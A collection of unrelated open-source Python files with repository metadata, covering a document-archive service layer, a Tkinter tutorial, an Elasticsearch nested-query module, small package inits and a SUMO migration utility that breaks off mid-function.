        pdf_from_text = self.pdf_generator.generate_file_pdf(document_file_info)
        tmp_file = tempfile.NamedTemporaryFile(mode="wb", suffix='.pdf', delete=False)
        try:
            tmp_file.write(pdf_from_text)
            tmp_file.close()
            return self.pdf_image_extractor.extract_image(tmp_file.name)
        finally:
            # Remove the temporary pdf even when image extraction fails;
            # the original code leaked the file in that case.
            tmp_file.close()
            os.unlink(tmp_file.name)
@singleton
class MovieImageGenerator:
    '''
    Generates an image from a movie file 4 seconds into the movie.
    '''
    @inject
    def __init__(self, document_file_manager: DocumentFileManager):
        self.document_file_manager = document_file_manager
    def generate_image(self, document_file_info):
        '''
        Uses ffmpeg to write a frame of the given video as jpg file that then will
        be read into a PIL image and the file removed.
        '''
        input_file_name = self.document_file_manager.get_file_path(document_file_info)
        # NamedTemporaryFile is only used to obtain a unique output name
        # for ffmpeg; the file content is written by ffmpeg below.
        tmp_file = tempfile.NamedTemporaryFile(mode="wb", suffix='.jpg', delete=False)
        tmp_file.close()
        output_file_name = tmp_file.name
        # Context manager closes the devnull handle again; the original
        # code leaked it on every call.
        with open(os.devnull, 'wb') as stdio:
            call(["ffmpeg",
                  "-itsoffset", "-4",
                  "-i", input_file_name,
                  "-vcodec", "mjpeg",
                  "-vframes", "1",
                  "-an",
                  "-f", "rawvideo",
                  "-y",
                  output_file_name
                 ],
                 stdout=stdio,
                 stderr=stdio)
        try:
            image = Image.open(output_file_name)
        finally:
            # Remove the temporary frame file even when PIL can't read it.
            os.unlink(output_file_name)
        return image
@singleton
class FileFormatService:
    '''
    Check service for file types.
    Checks if the file type is supported, and when it is an
    image file, determines the resolution and checks if it is
    allowed.
    The service may be configured overwriting the properties
    supported_formats, format_aliases, resolution_handlers and
    allowed_resolutions.
    '''
    @inject
    def __init__(self, config: Config):
        self.supported_formats = config.filetypes
        self.format_aliases = config.filetypealiases
        # TODO: Also put these options into the configuration
        self.resolution_handlers = {'tif': get_graphic_file_resolution,
                                    'jpg': get_graphic_file_resolution,
                                    'png': get_graphic_file_resolution,
                                    'gif': get_gif_file_resolution}
        self.allowed_resolutions = {'tif': [300, 400]}
    def get_format_and_resolution(self, file):
        '''
        Determines the file format and, if it
        is a graphics format, the resolution.
        '''
        fileformat = self._get_file_format(file)
        resolution = self._get_file_resolution(file, fileformat)
        return fileformat, resolution
    def _get_file_format(self, file):
        '''
        Determines the format from the file extension and checks that
        it is supported. Raises UnsupportedFileFormat if it is not.
        '''
        _, file_extension = os.path.splitext(file)
        fileformat = file_extension[1:].lower()
        if fileformat in self.format_aliases:
            fileformat = self.format_aliases[fileformat]
        if fileformat not in self.supported_formats:
            raise UnsupportedFileFormat(fileformat)
        return fileformat
    def _get_file_resolution(self, file, fileformat):
        '''
        Determines the file resolution (if appropriate). Raises
        an UnsupportedFileResolution exception, if it violates
        the configured constraints.
        '''
        resolution = None
        if fileformat in self.resolution_handlers:
            resolution = self.resolution_handlers[fileformat](file)
        if fileformat in self.allowed_resolutions:
            if resolution not in self.allowed_resolutions[fileformat]:
                raise UnsupportedFileResolution(fileformat, resolution)
        return resolution
class DocumentService(BaseRecordService):
    '''
    Service to bundle the complicated document file management
    with the database information.
    '''
    @inject
    def __init__(self,
                 dokument_dao: DocumentDao,
                 document_file_info_dao: DocumentFileInfoDao,
                 document_file_manager: DocumentFileManager,
                 document_type_dao: DocumentTypeDao,
                 document_file_provider: FileProvider,
                 ereignis_dao: EventDao,
                 file_format_service: FileFormatService,
                 filter_expression_builder:
                 baseinjectorkeys.DOCUMENT_FILTER_EXPRESSION_BUILDER_KEY):
        # pylint: disable=too-many-arguments
        BaseRecordService.__init__(self, dokument_dao, filter_expression_builder)
        self.document_file_info_dao = document_file_info_dao
        self.document_file_manager = document_file_manager
        self.document_type_dao = document_type_dao
        self.document_file_provider = document_file_provider
        self.ereignis_dao = ereignis_dao
        self.file_format_service = file_format_service
    def get_by_id(self, object_id):
        '''
        Returns the document that the document file with the given id
        belongs to.
        '''
        file_info = self.document_file_info_dao.get_by_id(object_id)
        return self.dao.get_by_id(file_info.document_id)
    def add_document_file(self, document, file):
        '''
        Determines the file format (might result in an exception if the
        file format is not supported), then creates a new database entry
        for the file and finally moves the file to its correct location.
        '''
        file_format, resolution = self.file_format_service.get_format_and_resolution(file)
        file_info = self.document_file_info_dao.create_new_file_info(
            document.id,
            file_format,
            resolution)
        self._add_file_with_error_handling(file, file_info)
    def replace_document_file(self, file_info, file):
        '''
        Updates the format and resolution information in the database
        and moves the file to the place where it belongs. The existing
        file will be renamed to have .deleted as suffix. A former .deleted
        file will be overwritten.
        '''
        self.document_file_manager.delete_file(file_info)
        file_info.filetype, file_info.resolution = \
            self.file_format_service.get_format_and_resolution(file)
        self.document_file_info_dao.save(file_info)
        self._add_file_with_error_handling(file, file_info)
    def _add_file_with_error_handling(self, file, file_info):
        '''
        Helper method that tries to make as little mess as possible
        in the filesystem if something goes wrong.
        '''
        # pylint: disable=bare-except
        try:
            self.document_file_manager.add_file(file, file_info)
        except Exception:
            # Best effort rollback: remove whatever may have been
            # created before re-raising the original exception.
            try:
                self.document_file_manager.delete_file(file_info)
            except:
                pass
            self.document_file_info_dao.delete(file_info.id)
            # Bare raise keeps the original exception and traceback.
            raise
    def delete_file(self, document_file_info):
        '''
        Just deletes one document file (and the pertaining database information).
        The document entry itself remains.
        '''
        self.document_file_manager.delete_file(document_file_info)
        self.document_file_info_dao.delete(document_file_info.id)
    # pylint: disable=arguments-differ
    def delete(self, document):
        '''
        Deletes all the document files and all the database information.
        '''
        file_infos = self.document_file_info_dao.get_file_infos_for_document(document.id)
        for file_info in file_infos:
            self.document_file_manager.delete_file(file_info)
        self.dao.delete(document.id)
    def get_file_infos_for_document(self, document):
        '''
        Returns all the file infos for the given document, with missing
        resolution information filled in (see _update_resolution).
        '''
        return self._update_resolutions(
            self.document_file_info_dao.get_file_infos_for_document(document.id))
    def get_file_info_by_id(self, file_info_id):
        '''
        Returns the file info for a given file id.
        '''
        return self._update_resolution(self.document_file_info_dao.get_by_id(file_info_id))
    def get_file_for_file_info(self, file_info):
        '''
        Returns the path to the file described by the file_info.
        '''
        return self.document_file_manager.get_file_path(file_info)
    def get_pdf(self, document):
        '''
        Returns the document pdf file as byte string.
        '''
        return self.document_file_provider.get_pdf(document)
    def get_thumbnail(self, document_file_info):
        '''
        Returns a thumbnail for the document as byte string.
        '''
        return self.document_file_provider.get_thumbnail(document_file_info)
    def get_display_image(self, document_file_info):
        '''
        Returns a graphical representation of the document as byte string.
        '''
        return self.document_file_provider.get_display_image(document_file_info)
    def create_new(self):
        '''
        Creates a new Document entity with the default document type.
        '''
        document = Document()
        document.document_type = self.document_type_dao.get_by_id(1)
        return document
    def _update_resolution(self, file_info):
        '''
        The resolution information in the database is not complete (due to
        historical reasons). This is an auxiliary method to correct this
        until the database is cleaned up.
        '''
        if file_info.resolution is not None:
            return file_info
        if file_info.filetype == 'gif':
            # More historical debt: gif files always have a resolution of 72 dpi,
            # but in the early days we scanned with 300 dpi and saved them as gif,
            # so the gif seems to be too large. So in fact we have to interpret
            # the resolution as 300
            file_info.resolution = get_gif_file_resolution(None)
            return file_info
        if file_info.filetype in ('jpg', 'png', 'tif'):
            try:
                file_path = self.document_file_manager.get_file_path(file_info)
            except DocumentFileNotFound:
                return self._set_default_resolution(file_info)
            file_info.resolution = get_graphic_file_resolution(file_path)
            if not file_info.resolution:
                file_info = self._set_default_resolution(file_info)
        # Always return the file info, also for file types without
        # resolution handling.
        return file_info
    # pylint: disable=no-self-use
    def _set_default_resolution(self, file_info):
        '''
        Falls back to the typical resolution for the file type.
        '''
        if file_info.filetype == 'jpg':
            file_info.resolution = 72
        else:
            file_info.resolution = 300
        return file_info
    def _update_resolutions(self, file_info_list):
        '''
        Applies _update_resolution to every entry of the given list.
        '''
        return [self._update_resolution(file_info) for file_info in file_info_list]
@singleton
class DocumentTypeService(object):
    '''
    Service for querying the available document types.
    '''
    @inject
    def __init__(self, document_type_dao: DocumentTypeDao):
        '''
        Constructor
        '''
        self.document_type_dao = document_type_dao
    def get_document_type_dict(self):
        '''
        Returns all document types in form of a dictionary.
        '''
        return {document_type.description.upper(): document_type
                for document_type in self.document_type_dao.get_all()}
    def get_document_types(self):
        '''
        Returns all document types as a dictionary with
        the document type id as key and the document type description
        as value.
        '''
        return {document_type.id: document_type.description
                for document_type in self.document_type_dao.get_all()}
    def get_by_id(self, doc_type_id):
        '''
        Fetches a single document type by id.
        '''
        return self.document_type_dao.get_by_id(doc_type_id)
@singleton
class EventService(BaseRecordService):
    '''
    Service for event handling. Most of the calls are just
    passed through to the daos.
    '''
    @inject
    def __init__(self,
                 ereignis_dao: EventDao,
                 filter_expression_builder: baseinjectorkeys.EVENT_FILTER_EXPRESSION_BUILDER_KEY,
                 event_crossreferences_dao: EventCrossreferencesDao,
                 event_type_dao: EventTypeDao):
        BaseRecordService.__init__(self, ereignis_dao, filter_expression_builder)
        self.event_crossreferences_dao = event_crossreferences_dao
        self.event_type_dao = event_type_dao
    def get_events_for_date(self, alex_date):
        '''
        Returns all events that have the given start date.
        '''
        return self.dao.get_events_for_date(alex_date)
    def get_cross_references(self, event):
        '''
        Returns all events that are crossreferenced to the given event.
        '''
        if event is None:
            return []
        referenced_ids = self.event_crossreferences_dao.get_cross_references(event.id)
        return [self.dao.get_by_id(referenced_id) for referenced_id in referenced_ids]
    def remove_cross_reference(self, event1, event2):
        '''
        Removes the crossreference between the given two events.
        '''
        self.event_crossreferences_dao.remove_cross_reference(event1.id, event2.id)
    def add_cross_reference(self, event1, event2):
        '''
        Crossreferences the two given events.
        '''
        self.event_crossreferences_dao.add_cross_reference(event1.id, event2.id)
    def create_new(self, date_range):
        '''
        Creates a new event object for the given date range.
        '''
        # pylint: disable=no-self-use
        new_event = Event()
        new_event.daterange = date_range
        return new_event
    # pylint: disable=arguments-differ
    def delete(self, event):
        '''
        Deletes the given event.
        '''
        self.dao.delete(event.id)
    def get_event_types(self, event):
        '''
        Fetches the event types registered for the given event.
        '''
        return self.event_type_dao.get_event_types_for_event_id(event.id)
    def add_event_type(self, event, event_type):
        '''
        Registers a new event type for the given event.
        '''
        self.event_type_dao.join_event_type_to_event_id(event.id, event_type)
    def remove_event_type(self, event, event_type):
        '''
        Removes an event type from the list of event
        types registered with the given event.
        '''
        self.event_type_dao.unlink_event_type_from_event_id(event.id, event_type)
    def get_event_type_tree(self):
        '''
        Returns all event types wrapped into a tree object.
        '''
        event_types = self.event_type_dao.find_all()
        root_node = EventType(EventTypeIdentifier(0, 0),
                              _("Event types"))
        event_types.append(root_node)
        return Tree(event_types)
@singleton
class ReferenceService:
    '''
    Service for handling references to the main records.
    '''
    @inject
    def __init__(self,
                 event_dao: EventDao,
                 document_dao: DocumentDao,
                 references_dao: DocumentEventRelationsDao):
        '''
        Used for injection.
        '''
        self.event_dao = event_dao
        self.document_dao = document_dao
        self.references_dao = references_dao
    def get_events_referenced_by_document(self, document):
        '''
        Returns the events that are related to a document.
        '''
        referenced_ids = self.references_dao.fetch_ereignis_ids_for_dokument_id(document.id)
        return [self.event_dao.get_by_id(event_id) for event_id in referenced_ids]
    def get_documents_referenced_by_event(self, event):
        '''
        Returns the documents that are related to an event.
        '''
        referenced_ids = self.references_dao.fetch_document_ids_for_event_id(event.id)
        return [self.document_dao.get_by_id(document_id) for document_id in referenced_ids]
    def link_document_to_event(self, document, event):
        '''
        Creates a reference between a document and an event.
        '''
        self.references_dao.join_document_id_with_event_id(document.id, event.id)
    def delete_document_event_relation(self, document, event):
        '''
        Removes the reference between a document and an event.
        '''
        self.references_dao.delete_document_event_relation(document.id, event.id)
class ServiceModule(Module):
    '''
    Injector module for the services.

    The services themselves are bound through their @singleton /
    @inject annotations; this module only provides the dictionaries
    that map file types to the appropriate handlers.
    (A large block of dead, commented-out explicit bindings that
    duplicated the annotation-based configuration was removed.)
    '''
    @provider
    @inject
    def provide_pdf_handlers(self,
                             graphics_handler: GraphicsPdfHandler,
                             text_handler: TextPdfHandler
                             ) -> baseinjectorkeys.PDF_HANDLERS_KEY:
        '''
        Returns the handlers to create pdf representations for certain
        file types.
        '''
        # pylint: disable=no-self-use
        return {'jpg': graphics_handler,
                'tif': graphics_handler,
                'gif': graphics_handler,
                'txt': text_handler}
    @provider
    @inject
    def provide_image_generators(self,
                                 graphics_image_generator: GraphicsImageGenerator,
                                 text_image_generator: TextImageGenerator,
                                 pdf_image_generator: PdfImageGenerator,
                                 movie_image_generator: MovieImageGenerator
                                 ) -> baseinjectorkeys.IMAGE_GENERATORS_KEY:
        '''
        Returns the handlers that generate preview images for the
        different file types.
        '''
        # pylint: disable=no-self-use
        return {'jpg': graphics_image_generator,
                'tif': graphics_image_generator,
                'gif': graphics_image_generator,
                'txt': text_image_generator,
                'pdf': pdf_image_generator,
                'mpg': movie_image_generator}
|
archivsozialebewegungen/AlexandriaBase
|
alexandriabase/services.py
|
Python
|
gpl-3.0
| 69,870
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
ZetCode Tkinter tutorial
This script shows a simple window
on the screen.
Author: Jan Bodnar
Last modified: November 2015
Website: www.zetcode.com
"""
from Tkinter import Tk, Frame, BOTH
from ttk import Button, Style
class myApp(Frame):
    '''
    Main application frame: sizes the window to half the screen,
    centers it and shows a quit button in its middle.
    '''
    def __init__(self, parent):
        Frame.__init__(self, parent, background="white")
        self.parent = parent
        self.initUI()
    def initUI(self):
        '''
        Computes the centered half-screen geometry and builds the widgets.
        '''
        # Query the screen size only once (the original code queried it
        # twice). Integer division keeps the geometry values integral
        # under Python 3 as well; under Python 2 '/' already truncated.
        sw = self.parent.winfo_screenwidth()
        sh = self.parent.winfo_screenheight()
        w = sw // 2
        h = sh // 2
        x = (sw - w) // 2
        y = (sh - h) // 2
        self.parent.geometry('%dx%d+%d+%d' % (w, h, x, y))
        self.parent.title("myApp")
        self.style = Style()
        self.style.theme_use("default")
        self.pack(fill=BOTH, expand=1)
        quitButton = Button(self, text="Quit",
                            command=self.quit)
        quitButton.place(x=w // 2, y=h // 2)
def main():
    '''
    Creates the Tk root window, attaches the application frame
    and starts the event loop.
    '''
    root = Tk()
    # The frame registers itself with the root window in its constructor.
    app = myApp(root)
    root.mainloop()
if __name__ == '__main__':
    main()
|
iosonosempreio/getsorted
|
ex1.py
|
Python
|
gpl-3.0
| 1,164
|
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http:# mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski (kyle@lahnakoski.com)
#
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from jx_elasticsearch import es09, es14
from mo_dots import split_field, FlatList, listwrap, literal_field, coalesce, Data, unwrap, concat_field, join_field
from mo_logs import Log
from mo_threads import Thread
from pyLibrary import convert
from jx_base.expressions import compile_expression
from jx_elasticsearch.es14.expressions import split_expression_by_depth, simplify_esfilter, AndOp, Variable, LeavesOp
from jx_elasticsearch.es14.setop import format_dispatch
from jx_elasticsearch.es14.util import jx_sort_to_es_sort
from jx_python.containers import STRUCT
from jx_python.query import DEFAULT_LIMIT
from mo_times.timer import Timer
EXPRESSION_PREFIX = "_expr."
_ = convert
def is_deepop(es, query):
    """
    Decide whether the query must be handled as a deep (nested) operation.

    Queries with edges or groupby are never deep; neither are queries
    whose selects are all aggregates. Otherwise a dotted table name
    signals a nested query path.
    """
    if query.edges or query.groupby:
        return False
    selects = listwrap(query.select)
    if all(s.aggregate not in (None, "none") for s in selects):
        return False
    # ASSUME IT IS NESTED IF WE ARE ASKING FOR NESTED COLUMNS
    # vars_ = query_get_all_vars(query)
    # columns = query.frum.get_columns()
    # if any(c for c in columns if len(c.nested_path) != 1 and c.name in vars_):
    #    return True
    return len(split_field(query.frum.name)) > 1
def es_deepop(es, query):
    """Execute *query* against nested ("deep") documents in Elasticsearch.

    Builds an ES query over the nested query path, optionally issues a second
    query (in a background thread) for parent documents that have no nested
    children, then streams the combined hits through the requested formatter.
    """
    schema = query.frum.schema
    columns = schema.columns
    query_path = schema.query_path
    # Map schema names to the dotted paths used to pull values out of a hit.
    map_to_local = {k: get_pull(c[0]) for k, c in schema.lookup.items()}
    # TODO: FIX THE GREAT SADNESS CAUSED BY EXECUTING post_expressions
    # THE EXPRESSIONS SHOULD BE PUSHED TO THE CONTAINER: ES ALLOWS
    # {"inner_hit":{"script_fields":[{"script":""}...]}}, BUT THEN YOU
    # LOOSE "_source" BUT GAIN "fields", FORCING ALL FIELDS TO BE EXPLICIT
    post_expressions = {}
    es_query, es_filters = es14.util.es_query_template(query.frum.name)
    # SPLIT WHERE CLAUSE BY DEPTH
    wheres = split_expression_by_depth(query.where, schema)
    for i, f in enumerate(es_filters):
        # PROBLEM IS {"match_all": {}} DOES NOT SURVIVE set_default()
        for k, v in unwrap(simplify_esfilter(AndOp("and", wheres[i]).to_esfilter())).items():
            f[k] = v
    if not wheres[1]:
        # No deep-level filter: also fetch parent docs that have NO nested
        # children (the "not nested match_all" clause below).
        more_filter = {
            "and": [
                simplify_esfilter(AndOp("and", wheres[0]).to_esfilter()),
                {"not": {
                    "nested": {
                        "path": query_path,
                        "filter": {
                            "match_all": {}
                        }
                    }
                }}
            ]
        }
    else:
        more_filter = None
    es_query.size = coalesce(query.limit, DEFAULT_LIMIT)
    es_query.sort = jx_sort_to_es_sort(query.sort)
    es_query.fields = []
    is_list = isinstance(query.select, list)
    new_select = FlatList()
    # i indexes the output columns as they are assigned to select clauses
    i = 0
    for s in listwrap(query.select):
        if isinstance(s.value, LeavesOp):
            if isinstance(s.value.term, Variable):
                if s.value.term.var == ".":
                    # IF THERE IS A *, THEN INSERT THE EXTRA COLUMNS
                    for c in columns:
                        if c.type not in STRUCT and c.es_column != "_id":
                            if c.nested_path[0] == ".":
                                es_query.fields += [c.es_column]
                            new_select.append({
                                "name": c.names[query_path],
                                "pull": get_pull(c),
                                "nested_path": c.nested_path[0],
                                "put": {"name": literal_field(c.names[query_path]), "index": i, "child": "."}
                            })
                            i += 1
                    # REMOVE DOTS IN PREFIX IF NAME NOT AMBIGUOUS
                    col_names = set(c.names[query_path] for c in columns)
                    for n in new_select:
                        if n.name.startswith("..") and n.name.lstrip(".") not in col_names:
                            n.name = n.name.lstrip(".")
                            n.put.name = literal_field(n.name)
                            col_names.add(n.name)
                else:
                    # Leaves of a specific variable: expand to all columns
                    # under that prefix.
                    prefix = schema[s.value.term.var][0].names["."] + "."
                    prefix_length = len(prefix)
                    for c in columns:
                        cname = c.names["."]
                        if cname.startswith(prefix) and c.type not in STRUCT:
                            pull = get_pull(c)
                            if c.nested_path[0] == ".":
                                es_query.fields += [c.es_column]
                            new_select.append({
                                "name": s.name + "." + cname[prefix_length:],
                                "pull": pull,
                                "nested_path": c.nested_path[0],
                                "put": {
                                    "name": s.name + "." + literal_field(cname[prefix_length:]),
                                    "index": i,
                                    "child": "."
                                }
                            })
                            i += 1
        elif isinstance(s.value, Variable):
            if s.value.var == ".":
                # Select everything: one output column per leaf column.
                for c in columns:
                    if c.type not in STRUCT and c.es_column != "_id":
                        if len(c.nested_path) == 1:
                            es_query.fields += [c.es_column]
                        new_select.append({
                            "name": c.name,
                            "pull": get_pull(c),
                            "nested_path": c.nested_path[0],
                            "put": {"name": ".", "index": i, "child": c.es_column}
                        })
                        i += 1
            elif s.value.var == "_id":
                new_select.append({
                    "name": s.name,
                    "value": s.value.var,
                    "pull": "_id",
                    "put": {"name": s.name, "index": i, "child": "."}
                })
                i += 1
            else:
                prefix = schema[s.value.var][0]
                if not prefix:
                    net_columns = []
                else:
                    parent = prefix.es_column+"."
                    prefix_length = len(parent)
                    net_columns = [c for c in columns if c.es_column.startswith(parent) and c.type not in STRUCT]
                if not net_columns:
                    # A plain leaf column: pull it directly.
                    pull = get_pull(prefix)
                    if len(prefix.nested_path) == 1:
                        es_query.fields += [prefix.es_column]
                    new_select.append({
                        "name": s.name,
                        "pull": pull,
                        "nested_path": prefix.nested_path[0],
                        "put": {"name": s.name, "index": i, "child": "."}
                    })
                else:
                    done = set()
                    for n in net_columns:
                        # THE COLUMNS CAN HAVE DUPLICATE REFERNCES TO THE SAME ES_COLUMN
                        if n.es_column in done:
                            continue
                        done.add(n.es_column)
                        pull = get_pull(n)
                        if len(n.nested_path) == 1:
                            es_query.fields += [n.es_column]
                        new_select.append({
                            "name": s.name,
                            "pull": pull,
                            "nested_path": n.nested_path[0],
                            "put": {"name": s.name, "index": i, "child": n.es_column[prefix_length:]}
                        })
            i += 1
        else:
            # General expression: compile it to Python and evaluate per-hit
            # after the results come back (see TODO above).
            expr = s.value
            for v in expr.vars():
                for c in schema[v]:
                    if c.nested_path[0] == ".":
                        es_query.fields += [c.es_column]
                    # else:
                    #     Log.error("deep field not expected")
            pull = EXPRESSION_PREFIX + s.name
            post_expressions[pull] = compile_expression(expr.map(map_to_local).to_python())
            new_select.append({
                "name": s.name if is_list else ".",
                "pull": pull,
                "value": expr.__data__(),
                "put": {"name": s.name, "index": i, "child": "."}
            })
            i += 1
    # <COMPLICATED> ES needs two calls to get all documents
    more = []
    def get_more(please_stop):
        # Second query: parents without nested children (see more_filter).
        more.append(es09.util.post(
            es,
            Data(
                filter=more_filter,
                fields=es_query.fields
            ),
            query.limit
        ))
    if more_filter:
        need_more = Thread.run("get more", target=get_more)
    with Timer("call to ES") as call_timer:
        data = es09.util.post(es, es_query, query.limit)
    # EACH A HIT IS RETURNED MULTIPLE TIMES FOR EACH INNER HIT, WITH INNER HIT INCLUDED
    def inners():
        # Generator over hits: one yield per inner (nested) hit, with the
        # post_expressions evaluated against each combined document.
        for t in data.hits.hits:
            for i in t.inner_hits[literal_field(query_path)].hits.hits:
                t._inner = i._source
                for k, e in post_expressions.items():
                    t[k] = e(t)
                yield t
        if more_filter:
            # Append the parents that had no nested children.
            Thread.join(need_more)
            for t in more[0].hits.hits:
                yield t
        #</COMPLICATED>
    try:
        formatter, groupby_formatter, mime_type = format_dispatch[query.format]
        output = formatter(inners(), new_select, query)
        output.meta.timing.es = call_timer.duration
        output.meta.content_type = mime_type
        output.meta.es_query = es_query
        return output
    except Exception as e:
        Log.error("problem formatting", e)
def get_pull(column):
    """Return the dotted path used to extract *column*'s value from an ES hit.

    Shallow columns come from the hit's "fields"; nested columns are read
    from the "_inner" document, relative to their nested path depth.
    """
    nested = column.nested_path[0]
    if nested == ".":
        return concat_field("fields", literal_field(column.es_column))
    depth = len(split_field(nested))
    relative_parts = split_field(column.es_column)[depth:]
    return join_field(["_inner"] + relative_parts)
|
maggienj/ActiveData
|
jx_elasticsearch/es14/deep.py
|
Python
|
mpl-2.0
| 10,475
|
import pathlib
__author__ = 'EAMY'
__email__ = 'team@eamy.org'
__version__ = '0.1.0'
from . import config
# Rebase all configured paths at import time: DATADIR becomes an absolute
# path under the current working directory, and PIDFILE/LOGFILE are moved
# inside it.
datapath = pathlib.Path('.').resolve().joinpath(config.DATADIR)
config.DATADIR = str(datapath)
config.PIDFILE = str(datapath.joinpath(config.PIDFILE))
config.LOGFILE = str(datapath.joinpath(config.LOGFILE))
|
eamy-org/imi
|
imi/__init__.py
|
Python
|
mpl-2.0
| 316
|
# flake8: noqa
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from .logger import *
from .loglistener import LogMessageServer
from .loggingmixin import LoggingMixin
|
Yukarumya/Yukarum-Redfoxes
|
testing/mozbase/mozlog/mozlog/unstructured/__init__.py
|
Python
|
mpl-2.0
| 318
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Get current date. """
import datetime
# Module-level holder for today's date; assigned only when run as a script.
CURDATE = None
def get_current_date():
    """Return the current local date.

    Returns:
        datetime.date: Today's date.
    """
    today = datetime.date.today()
    return today
if __name__ == '__main__':
    CURDATE = get_current_date()
    # print(...) with a single argument is valid in both Python 2 and 3;
    # the original bare `print CURDATE` statement is a SyntaxError on Python 3.
    print(CURDATE)
|
rrafiringa/is210-week-05-synthesizing
|
task_01.py
|
Python
|
mpl-2.0
| 308
|
# coding=utf-8
'''
@author:黄鑫晨
2016.12
'''
import json
import urllib
import urllib2
from mod.databases.tables import Users
# Sample uuid used by the manual test at the bottom of this file.
_uuid = 'fd4b2c58db1e394d312c9e7ca53e588999f491ce'
def get_uinfo_from_uuid(_uuid):
    """Resolve a uuid to user info (card number, real name, ...) via the Herald API."""
    _check_path = 'http://www.heraldstudio.com/api/user'
    payload = urllib.urlencode({'uuid': _uuid})
    request = urllib2.Request(_check_path, payload)
    raw_body = urllib2.urlopen(request).read()
    parsed = json.loads(raw_body, encoding="utf-8")
    return parsed['content']
class User_info_handler(object):
    """Completes and reads back users' real names in the ``Users`` table.

    Real names are fetched from the campus-card service via
    ``get_uinfo_from_uuid`` and cached in the database.
    """
    def __init__(self, db):
        # db: database session used for all queries (SQLAlchemy-style
        # query/filter/commit API -- TODO confirm against callers).
        self.db = db
    # (Translation of the stray string below: "complete user info -- write
    # the user's real name into the user table".)
    '''
    完善用户信息,将用户真实姓名写入user表中
    '''
    def complete_user_name(self, uuid):
        '''
        Fetch the user's real name from the campus-card service and, when
        no name is stored yet, persist it to the database.
        :return: None
        '''
        try:
            uinfo = get_uinfo_from_uuid(uuid)
            name = uinfo['name']
            cardnum = uinfo['cardnum']
            try:
                user = self.db.query(Users).filter(Users.cardnum == cardnum).one()
                # Name already stored: nothing to do.
                if user.name:
                    pass
                # Not stored yet: save the fetched real name.
                else:
                    # Real name returned by the campus-card service.
                    real_name = name
                    # Persist the real name on the user row.
                    user.name = real_name
                    try:
                        self.db.commit()
                    except Exception, e:
                        print e
            except Exception, e:
                print e
        except Exception,e:
            print '获取用户信息出错'
    def get_user_name_from_cardnum(self, cardnum):
        '''
        Look up the user's real name by card number.
        :return: the real name, or 0 when the user is missing / on error
        '''
        try:
            user = self.db.query(Users).filter(Users.cardnum == cardnum).one()
            # Return the stored real name when present.
            if user.name:
                return user.name
        except Exception, e:
            return 0
    # Build the serializable model for an (optionally anonymous) comment.
    def get_comment_model(self, each, is_parased, ano):
        '''
        :param each: one comment row
        :param is_parased: whether the current user has liked this comment
        :param ano: whether the comment is anonymous (1 = anonymous)
        :return: a dict describing the comment
        '''
        if ano == 1:
            # Anonymous: mask the author's name.
            comment_anonymous = dict(
                time=each.commentT.strftime('%Y-%m-%d %H:%M:%S'),
                user_name='匿名用户'.decode('utf-8'),
                likeN=each.likeN,
                content=each.content,
                cid=each.id,
                parase=is_parased  # whether the current user has liked it
            )
            return comment_anonymous
        elif ano == 0:
            # Named comment: resolve and show the real name.
            real_name = self.get_user_name_from_cardnum(each.cardnum)
            comment_real = dict(
                time=each.commentT.strftime('%Y-%m-%d %H:%M:%S'),
                user_name=real_name,
                likeN=each.likeN,
                content=each.content,
                cid=each.id,
                parase=is_parased  # whether the current user has liked it
            )
            return comment_real
def check_superuser(_superuser):
    """Validate a superuser when changing state; currently every caller is accepted."""
    return True
if __name__ == "__main__":
    pass
    # NOTE(review): ``db`` is never defined in this module, so the lines
    # below raise NameError when the file is run directly; this looks like
    # leftover manual-test code (Python 2 print statements).
    user_info_handler = User_info_handler(db)
    print user_info_handler.complete_user_name(_uuid)
    print user_info_handler.get_user_name_from_cardnum('213160925')
|
HeraldStudio/HeraldAppApi
|
mod/huati/getUserInfo.py
|
Python
|
mpl-2.0
| 3,658
|
import json
from configparser import ConfigParser, NoOptionError, NoSectionError
import pymysql
class Link(object):
    """A wiki-style link parsed from SUMO content.

    Carries six positional fields: kind, target, extra, slug, locale, hash.
    """

    def __init__(self, *args):
        (self.kind, self.target, self.extra, self.slug, self.locale,
         self.hash) = args

    @property
    def args(self):
        """The constructor arguments, in their original order."""
        return (self.kind, self.target, self.extra, self.slug, self.locale,
                self.hash)

    def __repr__(self):
        joined = ', '.join(str(part) for part in self.args)
        return '<sumomomig.utils.Link (' + joined + ')>'

    def __str__(self):
        """Render the link back to ``[[...]]`` wiki syntax."""
        text = self.target or ''
        # Non-article links carry an explicit "Kind:" prefix.
        if self.kind != 'Article' and not text.startswith(self.kind + ':'):
            text = self.kind + ':' + text
        if self.hash:
            text += self.hash
        if self.extra:
            text += '|' + self.extra
        return '[[' + text + ']]'

    def __json__(self):
        return self.args
class Image(object):
    """An image record with title, locale, description, file and thumbnail."""

    def __init__(self, *args):
        (self.title, self.locale, self.description, self.file,
         self.thumbnail) = args

    @property
    def args(self):
        """The constructor arguments, in their original order."""
        return (self.title, self.locale, self.description, self.file,
                self.thumbnail)

    def __repr__(self):
        return '<sumomomig.utils.Image "{0.title}">'.format(self)

    def __json__(self):
        return self.args

    def as_dict(self):
        """Return the record as a plain field-name -> value dict."""
        keys = ('title', 'locale', 'description', 'file', 'thumbnail')
        return dict(zip(keys, self.args))
class MyEncoder(json.JSONEncoder):
    """JSON encoder that serializes sets as lists and honors ``__json__()``."""

    def default(self, obj):
        if isinstance(obj, set):
            return list(obj)
        if hasattr(obj, '__json__'):
            return obj.__json__()
        return super(MyEncoder, self).default(obj)
def write_out(data, step):
    """Dump *data* to ``out.<step>.json`` in the current directory."""
    path = 'out.{0}.format'.replace('format', 'json').format(step) if False else 'out.{0}.json'.format(step)
    with open(path, 'w') as fh:
        json.dump(data, fh, cls=MyEncoder, indent=4, sort_keys=True)
def read_in(from_step):
    """Load ``out.<from_step>.json`` and rehydrate Link/Image objects."""
    with open('out.{0}.json'.format(from_step)) as fh:
        data = json.load(fh)
    data['links'] = [Link(*args) for args in data['links']]
    data['images'] = [Image(*args) for args in data['images']]
    # Per-document links are stored the same way and need rehydrating too.
    for doc in data['docs']:
